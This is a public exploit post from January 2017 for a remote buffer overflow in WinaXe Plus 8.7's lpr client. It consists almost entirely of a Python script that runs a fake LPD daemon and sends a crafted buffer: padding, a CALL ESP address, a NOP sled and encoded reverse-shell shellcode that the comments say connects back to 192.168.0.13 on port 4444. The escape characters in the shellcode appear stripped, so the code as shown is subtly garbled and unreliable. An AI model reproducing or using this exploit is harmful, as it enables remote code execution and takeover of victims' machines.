WinaXe Plus 8.7 Buffer Overflow
Posted on 17 January 2017
# Exploit Title: WinaXe Plus 8.7 - lpr remote buffer overflow # Date: 2017-01-16 # Exploit Author: Peter Baris # Exploit link: http://www.saptech-erp.com.au/resources/winaxe_lpr.zip # Software Link: http://www.labf.com/download/winaxep-ok.html # Version: 8.7 # Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows 10 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64 #Start the fake LPD daemon -> Add the network printer -> Close import socket # WinAxe Plus 8.7 - lpr remote buffer overflow # Author: Peter Baris # Tested on Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows 10 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64 #reverse shell to 192.168.0.13 port 4444, length: 351 bytes, bad characters x00x0ax0d shell = ("xb8xb1x79xd9xb5xdbxdcxd9x74x24xf4x5bx33xc9xb1" "x52x83xebxfcx31x43x0ex03xf2x77x3bx40x08x6fx39" "xabxf0x70x5ex25x15x41x5ex51x5exf2x6ex11x32xff" "x05x77xa6x74x6bx50xc9x3dxc6x86xe4xbex7bxfax67" "x3dx86x2fx47x7cx49x22x86xb9xb4xcfxdax12xb2x62" "xcax17x8exbex61x6bx1exc7x96x3cx21xe6x09x36x78" "x28xa8x9bxf0x61xb2xf8x3dx3bx49xcaxcaxbax9bx02" "x32x10xe2xaaxc1x68x23x0cx3ax1fx5dx6exc7x18x9a" "x0cx13xacx38xb6xd0x16xe4x46x34xc0x6fx44xf1x86" "x37x49x04x4ax4cx75x8dx6dx82xffxd5x49x06x5bx8d" "xf0x1fx01x60x0cx7fxeaxddxa8xf4x07x09xc1x57x40" "xfexe8x67x90x68x7ax14xa2x37xd0xb2x8exb0xfex45" "xf0xeax47xd9x0fx15xb8xf0xcbx41xe8x6axfdxe9x63" "x6ax02x3cx23x3axacxefx84xeax0cx40x6dxe0x82xbf" "x8dx0bx49xa8x24xf6x1ax17x10xf8xd7xffx63xf8xf6" "xa3xeax1ex92x4bxbbx89x0bxf5xe6x41xadxfax3cx2c" "xedx71xb3xd1xa0x71xbexc1x55x72xf5xbbxf0x8dx23" "xd3x9fx1cxa8x23xe9x3cx67x74xbexf3x7ex10x52xad" "x28x06xafx2bx12x82x74x88x9dx0bxf8xb4xb9x1bxc4" "x35x86x4fx98x63x50x39x5exdax12x93x08xb1xfcx73" "xccxf9x3ex05xd1xd7xc8xe9x60x8ex8cx16x4cx46x19" "x6fxb0xf6xe6xbax70x06xadxe6xd1x8fx68x73x60xd2" "x8axaexa7xebx08x5ax58x08x10x2fx5dx54x96xdcx2f" "xc5x73xe2x9cxe6x51") #100299DD - CALL ESP in xwpdllib.dll buffer="A"*512+"xddx99x02x10"+"x90"*32+shell port = 515 s = socket.socket() ip = '0.0.0.0' s.bind((ip, port)) s.listen(5) print 'Listening on LPD port: '+str(port) while True: conn, addr = s.accept() conn.send(buffer) conn.close()